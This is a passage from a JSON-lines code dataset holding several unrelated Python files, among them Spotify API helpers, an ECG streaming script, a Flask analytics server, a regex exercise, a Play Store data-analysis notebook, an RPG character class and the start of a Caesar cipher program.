GET_PLAYLIST_TRACKS_ENDPOINT.format(user_id=userID, playlist_id=playlistID)\n\tresp = requests.get(url, headers=headers)\n\treturn resp.json()\n\ndef getAudioFeatures(trackID, token):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\turl = GET_AUDIO_FEATURES.format(id=trackID)\n\tresp = requests.get(url, headers=headers)\n\treturn resp.json()\n\ndef makePlaylist(playlistIDS, oldName, token, userID):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\turl = MAKE_PLAYLIST_ENDPOINT.format(user_id=userID)\n\tname = oldName + '_TPP'\n\tdata = {\"name\": name, \"public\":False}\n\tresp = requests.post(url, headers=headers, data=json.dumps(data))\n\tplaylistID = resp.json()['id']\n\turl2 = ADD_TRACK_TO_PLAYLIST_ENDPOINT.format(user_id=userID, playlist_id=playlistID)\n\tfor trackID in playlistIDS:\n\t trackstring = []\n\t trackstring.append(\"spotify:track:{}\".format(trackID))\n\t data = {\"uris\": trackstring}\n\t resp = requests.post(url2, headers=headers, data=json.dumps(data))\n\ndef getAudioFeaturesForList(items, token):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\tplaylistData = []\n\tfor item in items:\n\t data = []\n\t data.append(item['track']['id'])\n\t results = getAudioFeatures(item['track']['id'], token)\n\t data.append(results)\n\t playlistData.append(data)\n\treturn playlistData","repo_name":"charlieringer/TravellingPlaylistProbelmHack","sub_path":"MyRequests.py","file_name":"MyRequests.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6840794902","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom pylsl import StreamInlet, resolve_stream\nimport numpy as np\n# %matplotlib notebook\nfrom matplotlib import pyplot as plt\nfrom network import IncUNet\nimport torch\n#from IPython.display import clear_output\n\n\n# In[ ]:\n\n\nprint(\"looking for an ECG stream...\")\nstreams = resolve_stream('type', 'EEG')\ninlet = StreamInlet(streams[0])\n#print(inlet)\n\nC,H,W = 1,1,5000\nloaded_model = IncUNet(in_shape=(C,H,W)) \nloaded_model.load_state_dict(torch.load(SAVED_MODEL_PATH, map_location = lambda storage, loc: storage, pickle_module=pickle))\nloaded_model.to(device)\nloaded_model.eval()\n\n\nsample_count =0\necg_2s = []\nwhile True:\n # get a new sample (you can also omit the timestamp part if you're not\n # interested in it)\n sample, timestamp = inlet.pull_sample()\n ecg_2s.append(sample) \n sample_count+=1\n if(len(ecg_2s)==500):\n plt.close()\n# clear_output()\n ecg_2s = np.array(ecg_2s)*1e-6\n print(ecg_2s.shape)\n plt.plot(ecg_2s[:,0])\n# plt.show()\n plt.pause(0.5)\n plt.close()\n ecg_2s = []\n# \n# plt.plot(ecg_2s)\n# ecg_2s = []\n# print(sample[0])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"acrarshin/OMNI","sub_path":"OMNI_OpenBCI_Pi_Inference/lsl_openbci.py","file_name":"lsl_openbci.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"15253909861","text":"# -*- coding: utf-8 -*\n# author: unknowwhite@outlook.com\n# wechat: Ben_Xiaobai\nimport sys\nsys.path.append(\"..\")\nsys.setrecursionlimit(10000000)\nfrom component.api import get_datas, get_long, shortit, show_short_cut_list, ghost_check ,installation_track,show_project_list,show_mobile_ad_list,show_mobile_src_list,create_mobile_ad_link,check_exist_distinct_id,who_am_i,shortcut_read,show_qrcode,show_long_qrcode,show_all_logos,show_logo\nfrom component.api_noti import show_usergroup_plan,show_usergroup_list,duplicate_scheduler_jobs,show_usergroup_data,disable_usergroup_data,show_temples,apply_temples_list,show_noti_group,show_noti_detial,manual_send,disable_single,show_scheduler_jobs,create_scheduler_jobs_manual,create_manual_temple_noti,create_manual_non_temple_noti\nfrom configs import admin\nfrom flask_cors import CORS\nfrom flask import jsonify\nfrom flask import make_response\nfrom flask import request\nfrom flask import Flask\n\n\napp = Flask(__name__)\nCORS(app)\n\ndef return_error(code=0):\n pagename = str(code) + ' '+admin.bbhj_keyword\n if admin.use_bbhj is False:\n return pagename\n if admin.use_bbhj is True:\n return f\"\"\"\"\"\"\n\n\n\n@app.errorhandler(404)\ndef miss(e):\n return return_error(code=404)\n\n@app.errorhandler(500)\ndef error(e):\n return return_error(code=500)\n\n@app.errorhandler(405)\ndef error2(e):\n return return_error(code=405)\n\n\n@app.route('/')\ndef index():\n return return_error()\n\n#项目管理\napp.add_url_rule('/show_project_list', view_func=show_project_list, methods=['POST'])#查询已有项目信息\n#数据收集\napp.add_url_rule('/sa.gif', view_func=get_datas, methods=['GET', 'POST'])#神策SDK上报接口\n#短连接\napp.add_url_rule('/t/', view_func=get_long, methods=['GET', 'POST'])#解析接口\napp.add_url_rule('/.gif', view_func=shortcut_read, methods=['GET'])#站外跟踪\napp.add_url_rule('/shortit', view_func=shortit, methods=['POST'])#短链创建接口\napp.add_url_rule('/shortlist', view_func=show_short_cut_list,methods=['GET', 'POST'])#短链列表\napp.add_url_rule('/qr/', view_func=show_qrcode,methods=['GET', 'POST'])#显示短连接二维码\napp.add_url_rule('/qrcode', view_func=show_long_qrcode,methods=['GET', 'POST'])#显示长链接二维码\napp.add_url_rule('/image/', view_func=show_logo, methods=['GET'])#显示LOGO预览\napp.add_url_rule('/logo_list', view_func=show_all_logos, methods=['GET'])#显示LOGO预览\n#埋点管理\napp.add_url_rule('/ghost_check', view_func=ghost_check, methods=['POST'])#埋点校验接口\n#移动广告跟踪\napp.add_url_rule('/cb/installation_track', view_func=installation_track, methods=['GET'])#DSP上报接口\napp.add_url_rule('/show_mobile_ad_list', view_func=show_mobile_ad_list, methods=['GET'])#移动跟踪列表\napp.add_url_rule('/create_mobile_ad_link', view_func=create_mobile_ad_link, methods=['POST'])#创建移动广告跟踪链接\napp.add_url_rule('/show_mobile_src_list', view_func=show_mobile_src_list, methods=['GET','POST'])#获取支持的跟踪列表\napp.add_url_rule('/check_exist', view_func=check_exist_distinct_id, methods=['GET'])#查询idfa或其他id是否已存在\n#辅助功能\napp.add_url_rule('/who_am_i', view_func=who_am_i, methods=['GET'])#获取自身ip\n\n#用户分群与召回\n# app.add_url_rule('/usergroups/check_enable_project', view_func=create_mobile_ad_link, methods=['POST'])#查询开启了用户分群与召回的项目列表\napp.add_url_rule('/usergroups/show_usergroup_plan', view_func=show_usergroup_plan, methods=['POST'])#查询用户分群计划列表\napp.add_url_rule('/usergroups/show_usergroup_list', view_func=show_usergroup_list, methods=['POST'])#查询计划下的用户分群列表\napp.add_url_rule('/usergroups/duplicate_scheduler_jobs', view_func=duplicate_scheduler_jobs, methods=['POST'])#重新执行该分群\napp.add_url_rule('/usergroups/show_usergroup_data', view_func=show_usergroup_data, methods=['POST'])#查询计划下的用户分群列表的详情\napp.add_url_rule('/usergroups/disable_usergroup_data', view_func=disable_usergroup_data, methods=['POST'])#禁用单条分群结果\napp.add_url_rule('/usergroups/show_temples', view_func=show_temples, methods=['POST'])#查询可用的模板列表\napp.add_url_rule('/usergroups/apply_temples_list', view_func=apply_temples_list, methods=['POST'])#对单个分群列表应用模板\napp.add_url_rule('/usergroups/show_noti_group', view_func=show_noti_group, methods=['POST'])#查询消息群组\napp.add_url_rule('/usergroups/show_noti_detial', view_func=show_noti_detial, methods=['POST'])#查询消息群组详情\napp.add_url_rule('/usergroups/manual_send', view_func=manual_send, methods=['POST'])#手动推送消息群组\n# app.add_url_rule('/create_mobile_ad_link', view_func=create_mobile_ad_link, methods=['POST'])#手动推送单条消息\napp.add_url_rule('/usergroups/disable_single_noti', view_func=disable_single, methods=['POST'])#禁用单条消息\napp.add_url_rule('/usergroups/show_scheduler_jobs', view_func=show_scheduler_jobs, methods=['POST'])#查询分群任务列表\n# app.add_url_rule('/create_mobile_ad_link', view_func=create_mobile_ad_link, methods=['POST'])#手动插入推送消息\napp.add_url_rule('/usergroups/create_scheduler_jobs_manual',view_func=create_scheduler_jobs_manual, methods=['POST'])#手动开始执行分群\napp.add_url_rule('/usergroups/create_manual_temple_noti',view_func=create_manual_temple_noti, methods=['POST'])#手动创建模板消息\napp.add_url_rule('/usergroups/create_manual_non_temple_noti',view_func=create_manual_non_temple_noti, methods=['POST'])#手动创建非模板消息\n\nif __name__ == '__main__':\n app.run(threaded=True, host='0.0.0.0', port=8000) # 默认不填写的话,是5000端口;","repo_name":"Tandoy/Bigdata-learn","sub_path":"Data_Buriedpoint/Ghost_sa/ghost_sa-master/flask_main.py","file_name":"flask_main.py","file_ext":"py","file_size_in_byte":5938,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42283511297","text":"#!/usr/bin/python3\n\nfrom flask import Flask, redirect, url_for\n\napp = Flask(__name__)\n\n@app.route(\"/hello/\")\ndef hello(name):\n return f\"Hello {name} glad you could join us\"\n@app.route(\"/\")\ndef hello_world():\n with open(\"helloworld.txt\", \"w\") as hello:\n hello.write(\"you just wrote this line\")\n return \"File Created\"\n\nif __name__ == \"__main__\":\n app.run(port=5006)\n\n","repo_name":"infovein/pyapivz","sub_path":"flaskin/myflask01.py","file_name":"myflask01.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21588386421","text":"#### Consigna N°3\n#Escribir una función que, dado un String, permita validar si este se corresponde o no con un teléfono de CABA.\nimport re\n\ndef telefono_caba(string):\n print(bool(re.match(r'[+](54)(9?)(11)(\\d{8}$)', string)))\n\n#bool --> retorna True or False\n#match --> casi lo mismo que search --> solo que busca en la primer palabra\n# r -->siempre en re para que lea el string\n#[+] --> porque es un metacaracter\n#(9?) --> puede variar si esta o no\n# (\\d) --> numero\n#{8} --> que sean 8 numeros mas, ni mas ni menos\n#$ --> fin de linea\n\n\ndef tiene_h(string):\n print(bool(re.search(\"he{2,3}\", string) and not re.search(\"heeee+\", string)))\n\ntiene_h(\"hee\")\n\n\n\ntelefono_caba(\"1167958727\")\ntelefono_caba (\"+5491167958727\")\ntelefono_caba(\"+54911679587277\")\ntelefono_caba(\"+549111111111111111111111111\")\ntelefono_caba(\"+5491167958727\")\ntiene_h(\"heee\")\ntiene_h(\"heeermosa\")\n\n\nimport re\ndef telcorr(num):\n return bool(re.findall(\"54+(9*)+(\\d{10})\", num))\nprint(telcorr(\"5491167958727\"))\nprint(telcorr(\"54911679587257\"))","repo_name":"maiacarroll/Fundamentos_de_informatica_2022","sub_path":"aa. practicando/ejre.py","file_name":"ejre.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38292164692","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split as split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error as mse\n\n\n# In[2]:\n\n\n#Step 1. Load the data using pandas.\nappdata = pd.read_csv('/Users/priya/Pravat/Simplilearn Data Analytics/Class2/project/googleplaystore.csv')\nappdata.head(5)\n\n\n# In[3]:\n\n\nappdata.info()\n\n\n# In[4]:\n\n\nappdata.columns\n\n\n# In[5]:\n\n\n#Step 2. Check for null values in the data. Get the number of null values for each column.\nappdata.isnull().sum()\n\n\n# In[6]:\n\n\n#Step 3. Drop records with nulls in any of the columns.\nappdata.dropna(axis = 0, inplace=True)\n\n\n# In[7]:\n\n\n#verify\nappdata.isna().sum()\n\n\n# In[8]:\n\n\nappdata.shape\n\n\n# In[9]:\n\n\n#Step 4. Fix incorrect type and inconsistent formatting.\nappdata['Size']\n\n\n# In[10]:\n\n\nappdata['Size'].unique()\n\n\n# In[11]:\n\n\n#Format Size coloumn\nappdata['Size'] = appdata.Size.replace('Varies with device','0k')\nappdata['Size'] = appdata.Size.str.replace('M','000')\nappdata['Size'] = appdata.Size.str.replace('k','')\nappdata['Size'] = appdata.Size.replace('1,000+',1000)\nappdata['Size'] = appdata['Size'].astype(float)\n\n\n# In[12]:\n\n\n#verify\nappdata['Size'].dtype \n\n\n# In[13]:\n\n\n#verify\nappdata['Size']\n\n\n# In[14]:\n\n\n#change datatype for Reviews column to float\nappdata['Reviews']= appdata['Reviews'].astype(float)\n\n\n# In[15]:\n\n\n#Check Installs coloumn\nappdata['Installs'].unique()\n\n\n# In[16]:\n\n\n#Format Installs coloumn\nappdata['Installs'] = appdata.Installs.str.replace(',','')\nappdata['Installs'] = appdata.Installs.str.replace('+','')\nappdata['Installs'] = appdata.Installs.str.replace('Free','')\nappdata['Installs'] = appdata['Installs'].astype(float)\nappdata['Installs'] = appdata['Installs'].astype(float)\n\n\n# In[17]:\n\n\n#verify data type for the coloumn\nappdata['Installs'].dtype\n\n\n# In[18]:\n\n\nappdata.Installs\n\n\n# In[19]:\n\n\n#Check Price coloumn\nappdata['Price'].unique()\n\n\n# In[20]:\n\n\n#Format Price coloumn\nappdata['Price'] = appdata.Price.str.replace('$','').astype(float)\n\n\n# In[21]:\n\n\n#verify\nappdata['Price'].dtype\n\n\n# In[22]:\n\n\nappdata.Price\n\n\n# In[23]:\n\n\n#Step 5. Sanity checks: \n# all ratings are between 1 to 5\nappdata['Rating'].unique()\n\n\n# In[24]:\n\n\nappdata['Rating'].dtype\n\n\n# In[25]:\n\n\n# drop all rows with Ratings outside the 1-5 range\nRatingOut = appdata[(appdata['Rating'] < 0) & (appdata['Rating'] > 5)].index\nappdata.drop(RatingOut , inplace = True)\n\n\n# In[26]:\n\n\n#verify the rows and coloumns\nappdata.shape \n\n\n# In[27]:\n\n\n#Reviews should not be more than installs as only those who installed can review the app. If there are any such records, drop them.\nappdata = appdata[appdata['Reviews'] <= appdata['Installs']]\n\n\n# In[28]:\n\n\n#verify the rows and coloumns after drop\nappdata.shape\n\n\n# In[29]:\n\n\n#For free apps (type = “Free”), the price should not be >0. Drop any such rows.\n#get indexes where free Types have a price over 0\npriceindexOut = appdata[(appdata['Price'] >= 0.1) & (appdata['Type'] == 'Free')].index\n# drop these row \nappdata.drop(priceindexOut ,inplace = True)\n\n\n# In[30]:\n\n\n#verify after drop\nappdata.shape\n\n\n# In[31]:\n\n\n#Step 6. Performing univariate analysis:\n#find possible outliers in Price colomns and Review columns using Box Plot\n\n\n# In[32]:\n\n\nappdata['Price'].describe()\n\n\n# In[33]:\n\n\n#Boxplot for Price\nplt.figure(figsize= (15, 5))\nsns.boxplot(x = appdata.Price, color = 'mediumaquamarine',)\nplt.show()\n\n\n# - From the statistical analysis table and price box plot it is observed that apps over $100 are outliers.\n\n# In[34]:\n\n\n#Boxplot for Review\nplt.figure(figsize= (15, 5))\nsns.boxplot(x = appdata.Reviews, color = 'mediumaquamarine',)\nplt.show()\n\n\n# In[35]:\n\n\nappdata['Reviews'].describe()\n\n\n# - From the statistcial analysis table and box plot, it is observed that the averge number of reviews are 5,14,760 with a standard deviation of 31,46,169 between values. This deviation is due to several outliers in reviews column.\n\n# In[36]:\n\n\n#Histogram for Rating\nplt.figure(figsize= (10,5))\nsns.histplot(appdata.Rating, bins = 100, color = 'darkgreen', edgecolor = 'black')\nplt.show()\n\n\n# - From the rating histogram it is observed that most apps lean/skewed towards high ratings.\n\n# In[37]:\n\n\n#Histogram for Size\nplt.figure(figsize= (10,5))\nsns.displot(appdata.Size, kind = 'kde', color= 'steelblue')\nplt.show()\n\n\n# - From the size displot histogram, it is observed that most apps size are below 20,000 kb.\n\n# In[38]:\n\n\n#Step 7. Outlier treatment:\n\n\n# In[39]:\n\n\n#drop Price rows which are above 200\nappdata = appdata[appdata['Price'] < 200]\n#verify\nappdata.shape\n\n\n# In[40]:\n\n\n#Drop Review rows with over 2 million reviews\nappdata = appdata[appdata['Reviews'] <= 2000000]\n#verify\nappdata.shape\n\n\n# In[41]:\n\n\n#Apps having very high number of installs should be dropped from the analysis so drop rows with 100,000,000 and more Installs\nappdata = appdata[appdata['Installs'] <= 100000000]\n#verify\nappdata.shape\n\n\n# In[42]:\n\n\n#Find out the different percentiles – 10, 25, 50, 70, 90, 95, 99\npercentiles = appdata[['Rating','Reviews','Size','Installs','Price']]\n\n\n# In[43]:\n\n\n#10, 25, 50, 70, 90, 95, 99 percentiles\nprint(\"10th percentile : \",\n np.percentile(percentiles, 10))\nprint(\"25th percentile : \",\n np.percentile(percentiles, 25))\nprint(\"50th percentile : \", \n np.percentile(percentiles, 50))\nprint(\"70th percentile : \",\n np.percentile(percentiles, 70))\nprint(\"90th percentile : \",\n np.percentile(percentiles, 90))\nprint(\"95th percentile : \",\n np.percentile(percentiles, 95))\nprint(\"99th percentile : \",\n np.percentile(percentiles, 99))\n\n\n# In[44]:\n\n\n#find out remining outliers with boxplots \npercentiles.boxplot(rot = 50)\n\n\n# In[45]:\n\n\n#zoomed into Rating box plot to find out outliers\npercentiles.boxplot(column=['Rating'])\n\n\n# In[46]:\n\n\n#remove outliers from Ratings\nRatingOut1 = appdata[(appdata['Rating'] < 3.5) ].index\nappdata.drop(RatingOut1 , inplace = True)\n\n\n# In[47]:\n\n\nappdata.shape\n\n\n# In[48]:\n\n\n#zoomed into outliers from price coloumn\npercentiles.boxplot(column = ['Price'], figsize = (6,6))\n\n\n# In[49]:\n\n\n#remove outliers from price coloumn, anything above $40 seems outliers\nPriceOut = appdata[(appdata['Price'] > 40)].index\nappdata.drop(PriceOut , inplace = True)\n#verify\nappdata.shape\n\n\n# In[50]:\n\n\n#zoomed into outliers in Installs coloumn\npercentiles.boxplot(column = ['Installs'])\n\n\n# In[51]:\n\n\n#remove outliers from Installs coloumns\nInstallsout = appdata[(appdata['Installs'] >= 100000000)].index\nappdata.drop(Installsout , inplace = True)\n#verify\nappdata.shape\n\n\n# In[52]:\n\n\n#Step 8. Bivariate analysis\n#Scatter plot for Rating vs. Price\nplt.figure(figsize=(10, 9))\nsns.scatterplot(\n data=appdata, x=\"Rating\", y=\"Price\", hue=\"Rating\",\n sizes=(20, 200), legend=\"full\")\n\n\n# observation in Rating vs Price:\n# - Most Ratings for the apps are with in 4.4 to 5.0 and apps Prices are between 0 and $10. It is also observed that higher Price apps does not mean better ratings.\n\n# In[53]:\n\n\n#Scatter plot for Rating vs. Reviews\nplt.figure(figsize=(10, 9))\nsns.scatterplot(\n data=appdata, x=\"Rating\", y=\"Reviews\", hue=\"Rating\",\n sizes=(20, 200), legend=\"full\")\n\n\n# Observation in Rating vs Reviews:\n# - Better ratings apps have most reviews although not everytime is the case.\n\n# In[54]:\n\n\n#Box plot for Rating vs. Content Rating\nplt.figure(figsize=(12, 5))\nrvcr = sns.boxplot(data = appdata,x ='Content Rating', y ='Rating', palette ='Set3')\n\n\n# Observation in Rating vs Content Ratings:\n# - From the box plot, there does not seem to be much difference between Content Ratings in relation to Ratings.\n\n# In[55]:\n\n\n#Box plot for Rating vs. Category\nplt.figure(figsize=(12, 5))\nrvca = sns.boxplot(data = appdata,x ='Category', y ='Rating', palette ='Set3')\nplt.show(plt.setp(rvca.get_xticklabels(), rotation = 80))\n\n\n# In[56]:\n\n\n#categorical data in relation to Genres\nplt.figure(figsize=(20, 10))\ncgen = sns.barplot(data = appdata, x ='Genres', y ='Rating', palette ='Set2') \nplt.show (plt.setp(cgen.get_xticklabels(), rotation=90))\n\n\n# Box plot for Rating vs. Genres\n# - Comics;Creativity and Board Pretend Play has rate best ratings.\n\n# In[57]:\n\n\n#Step 9.Data preprocessing\n\n\n# In[58]:\n\n\ninp1 = appdata.copy()\n\n\n# In[59]:\n\n\ninp1.head(2)\n\n\n# In[60]:\n\n\ninp1.describe()\n\n\n# In[61]:\n\n\n# Apply log transformation to reduce the skew in Reviews and Installs.\ninp1.Reviews = np.log1p(inp1.Reviews.values)\ninp1.Installs = np.log1p(inp1.Installs.values)\n\n\n# In[62]:\n\n\n#verify after apply log transformation.\ninp1.describe()\n\n\n# In[63]:\n\n\n#Drop columns App, Last Updated, Current Ver, and Android Ver.\ninp1 = inp1.drop(['App', 'Last Updated', 'Current Ver', 'Android Ver'], axis = 1)\n\n\n# In[64]:\n\n\n#verify\ninp1.head(2)\n\n\n# In[65]:\n\n\n## convert the object type variable and convert them to dumies \ninp2 = pd.get_dummies(inp1, columns = ['Category','Type','Content Rating','Genres'])\n\n\n# In[66]:\n\n\ninp2\n\n\n# In[67]:\n\n\n#Step 10. Train test split and apply 70-30 split. Name the new dataframes df_train and df_test\ndf_train, df_test = split(inp2, test_size = 0.30, random_state = 12)\n\n\n# In[68]:\n\n\ndf_train.shape\n\n\n# In[69]:\n\n\ndf_test.shape\n\n\n# In[70]:\n\n\n#Step 11. Model bulding\nlm = LinearRegression()\n\n\n# In[71]:\n\n\n# fit the model \nX = df_train.drop(columns=['Rating'])\nY = df_train.Rating\nlm = lm.fit(X,Y)\n\n\n# In[72]:\n\n\nlm.coef_\n\n\n# In[73]:\n\n\nlm.intercept_\n\n\n# In[74]:\n\n\nlm.score(X,Y) # R squared value for the df_train data\n\n\n# In[75]:\n\n\n#ycap that is prediction for the df_train data \nycap = lm.predict(X)\nprint(ycap)\n\n\n# In[76]:\n\n\n#Step 12. Make predictions for df_test data\ndf_test_x = df_test.drop(columns = ['Rating'])\n\n\n# In[77]:\n\n\ny_pred = lm.predict(df_test_x)\nprint (y_pred)\n\n\n# In[78]:\n\n\nmse(y_true = df_test.Rating, y_pred = y_pred, squared = False) #MSE value for df_test data\n\n","repo_name":"pravatsahu01/Python-Google-Playstore","sub_path":"Pravat Sahu Google Playstore Project.py","file_name":"Pravat Sahu Google Playstore Project.py","file_ext":"py","file_size_in_byte":9901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38004571413","text":"from random import randint\nimport math\nfrom Classes.magic import ward_magic, sword_magic, sorce_magic\nfrom Classes.inventory import spellsword_inv, warden_inv, sorceror_inv\n\ndef build_hp(char):\n return\n\n\ndef build_mp(char):\n return char.get_lvl() * 10 + char.lvl * char.get_wis()\n\n\ndef value_mod(stat):\n return math.floor(((stat - 10) / 2))\n\n\nclass Character:\n\n def __init__(self, name, _str, _int, dex, wis, cha, con, magic, items, rollover=10, rollover2=10, money=0, lvl=1,\n _id=\"player\",\n prof=\"None\", magic_ac = 0):\n self.name = name\n self.lvl = lvl\n self.str = _str\n self.int = _int\n self.dex = dex\n self.wis = wis\n self.cha = cha\n self.con = con\n self.magic = magic\n self.items = items\n self.rollover = rollover\n self.maxhp = self.rollover + value_mod(self.con) + (self.lvl - 1) * (randint(0, self.rollover) + value_mod(self.con))\n self.hp = self.maxhp\n self.rollover2 = rollover2\n self.maxmp = self.rollover2 + value_mod(self.wis) + (self.lvl - 1) * (randint(0, self.rollover2) + value_mod(self.wis))\n self.mp = self.maxmp\n self.sleep = False\n self.fire = 0\n self.money = money\n self.quest = 0\n self.xp = 0\n self.id = _id\n self.prof = prof\n self.magic_ac = magic_ac\n\n def get_lvl(self):\n return self.lvl\n\n def display_name(self):\n print(\"I am called \", self.name, \"!\")\n\n def get_str(self):\n val = value_mod(self.str)\n return val\n\n def get_int(self):\n val = value_mod(self.int)\n return val\n\n def get_dex(self):\n val = value_mod(self.dex)\n return val\n\n def get_wis(self):\n val = value_mod(self.wis)\n return val\n\n def get_cha(self):\n val = value_mod(self.cha)\n return val\n\n def get_con(self):\n val = value_mod(self.con)\n return val\n\n def get_hp(self):\n return self.hp\n\n def get_mp(self):\n return self.mp\n\n def attack(self):\n print(\"{} attacks!\".format(self.name))\n return randint(1, 21) + self.get_str()\n\n def initiative(self):\n return randint(1,21) + self.get_dex()\n\n def ac_rating(self):\n return 10 + self.get_dex() + self.items[\"armor\"].val + self.magic_ac\n\n def reflex(self):\n return randint(1, 21) + self.get_dex()\n\n def fortitude(self):\n return randint(1, 21) + self.get_con()\n\n def will(self):\n return randint(1, 21) + self.get_wis()\n\n def take_damage(self, val):\n self.hp -= val\n print(\"{} has taken {} points of damage.\".format(self.name, val))\n return self.hp\n\n def take_mp(self, cost):\n self.mp -= cost\n return self.mp\n\n def heal(self, val):\n self.hp += val\n if self.hp > self.maxhp:\n self.hp = self.maxhp\n print(\"{} has healed for {} HP.\".format(self.name, val))\n return self.hp\n\n def rest(self, val):\n self.mp += val\n if self.mp > self.maxmp:\n self.mp = self.maxmp\n return self.mp\n\n def display_stats(self):\n print(\"Name: \", self.name, \"\\n\",\n \"Class: \", self.prof, \"\\n\",\n \"Level: \", self.lvl, \"\\n\",\n \"HP: \", self.hp, \"/\", self.maxhp, \"\\n\",\n \"MP: \", self.mp, \"/\", self.maxmp, \"\\n\",\n \"AC: \", self.ac_rating(), \"\\n\",\n \"Strength: +\", self.get_str(), \"\\n\",\n \"Dexterity: +\", self.get_dex(), \"\\n\",\n \"Wisdom: +\", self.get_wis(), \"\\n\",\n \"Constitution: +\", self.get_con())\n print(\"You have a {} equipped.\".format(self.items[\"weapon\"].name))\n print(\"You are wearing {}.\".format(self.items[\"armor\"].name))\n print(\"You have {} gold pieces.\".format(self.money))\n print(\"You have the following items in your rucksack:\")\n for item in self.items[\"items\"]:\n print(item.name)\n\n def __del__(self):\n pass\n\n def death_check(self):\n if self.hp <= 0:\n return True\n else:\n pass\n\n def damage(self, enemy):\n if self.items[\"weapon\"].type == \"weapon\":\n val = randint(1, self.items[\"weapon\"].item_value()) + self.get_str()\n if val < 0:\n return 1\n else:\n if self.items[\"weapon\"].elem == \"Magic\":\n if self.attack() + 5 > enemy.ac_rating():\n return val + 10\n else:\n return 0\n elif self.items[\"weapon\"].elem == \"Fire\":\n if self.attack() + 5 > enemy.ac_rating():\n enemy.fire = 5\n return val + 10\n else:\n return 0\n elif self.items[\"weapon\"].elem == \"Death\":\n if self.attack() + 5 > enemy.ac_rating():\n if enemy.will() < self.will():\n a = enemy.hp % 2\n return val + a\n else:\n return val\n else:\n return 0\n else:\n if self.attack() > enemy.ac_rating():\n return val\n else:\n return 0\n elif self.items[\"weapon\"].type == \"staff\":\n print(\"STAFF DAMAGE\")\n if self.items[\"weapon\"].elem == \"Magic\":\n return 10\n elif self.items[\"weapon\"].elem == \"Fire\":\n return 25\n elif self.items[\"weapon\"].elem == \"Death\":\n return 15\n elif self.items[\"weapon\"].elem == \"Alter\":\n return self.will()\n else:\n return randint(1, self.items[\"weapon\"].item_value()) + self.get_str()\n\n def reset(self):\n self.hp = self.maxhp\n self.mp = self.maxmp\n return self.hp, self.mp\n\n def win_gold(self, val):\n self.money += val\n print(\"You have won {}gp.\".format(val))\n return self.money\n\n def spend_gold(self, val):\n self.money -= val\n print(\"You have lost {}gp.\".format(val))\n return self.money\n\n def get_xp(self, val):\n self.xp += val\n return self.xp\n\n def profession(self, val):\n if val == 0:\n self.prof = \"Spellsword\"\n self.wis = 12\n self.dex = 12\n self.magic = sword_magic\n self.items = spellsword_inv\n self.rollover = 10\n self.rollover2 = 10\n self.maxhp = self.rollover + value_mod(self.con) + (self.lvl - 1) * (\n randint(0, self.rollover) + value_mod(self.con))\n self.hp = self.maxhp\n self.maxmp = self.rollover2 + value_mod(self.wis) + (self.lvl - 1) * (\n randint(0, self.rollover2) + value_mod(self.wis))\n self.mp = self.maxmp\n self.reset()\n elif val == 1:\n self.prof = \"Warden\"\n self.str = 12\n self.con = 12\n self.magic = ward_magic\n self.items = warden_inv\n self.rollover = 12\n self.rollover2 = 8\n self.maxhp = self.rollover + value_mod(self.con) + (self.lvl - 1) * (\n randint(0, self.rollover) + value_mod(self.con))\n self.hp = self.maxhp\n self.maxmp = self.rollover2 + value_mod(self.wis) + (self.lvl - 1) * (\n randint(0, self.rollover2) + value_mod(self.wis))\n self.mp = self.maxmp\n self.reset()\n elif val == 2:\n self.prof = \"Sorceror\"\n self.wis = 12\n self.con = 12\n self.magic = sorce_magic\n self.items = sorceror_inv\n self.rollover = 8\n self.rollover2 = 12\n self.maxhp = self.rollover + value_mod(self.con) + (self.lvl - 1) * (\n randint(0, self.rollover) + value_mod(self.con))\n self.hp = self.maxhp\n self.maxmp = self.rollover2 + value_mod(self.wis) + (self.lvl - 1) * (\n randint(0, self.rollover2) + value_mod(self.wis))\n self.mp = self.maxmp\n self.reset()\n print(\"You were trained to be a {}!\".format(self.prof))\n return self.prof\n","repo_name":"ersvoid/kingdom-of-aerune-game","sub_path":"Classes/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":8438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25741948172","text":"# create a program to encode and decode messages using the casear cipher\n# chr - converts a number to a character relevant to the ASCII table\n# ord - converts a character to an ASCII number\n# isalpha - checks if a character is a letter\n\nimport os\n\nlogo = \"\"\" \n ,adPPYba, ,adPPYYba, ,adPPYba, ,adPPYba, ,adPPYYba, 8b,dPPYba, \na8\" \"\" \"\" `Y8 a8P_____88 I8[ \"\" \"\" `Y8 88P' \"Y8 \n8b ,adPPPPP88 8PP\"\"\"\"\"\"\" `\"Y8ba, ,adPPPPP88 88 \n\"8a, ,aa 88, ,88 \"8b, ,aa aa ]8I 88, ,88 88 \n `\"Ybbd8\"' `\"8bbdP\"Y8 `\"Ybbd8\"' `\"YbbdP\"' `\"8bbdP\"Y8 88 \n 88 88 \n \"\" 88 \n 88 \n ,adPPYba, 88 8b,dPPYba, 88,dPPYba, ,adPPYba, 8b,dPPYba, \na8\" \"\" 88 88P' \"8a 88P' \"8a a8P_____88 88P' \"Y8 \n8b 88 88 d8 88 88 8PP\"\"\"\"\"\"\" 88 \n\"8a, ,aa 88 88b, ,a8\" 88 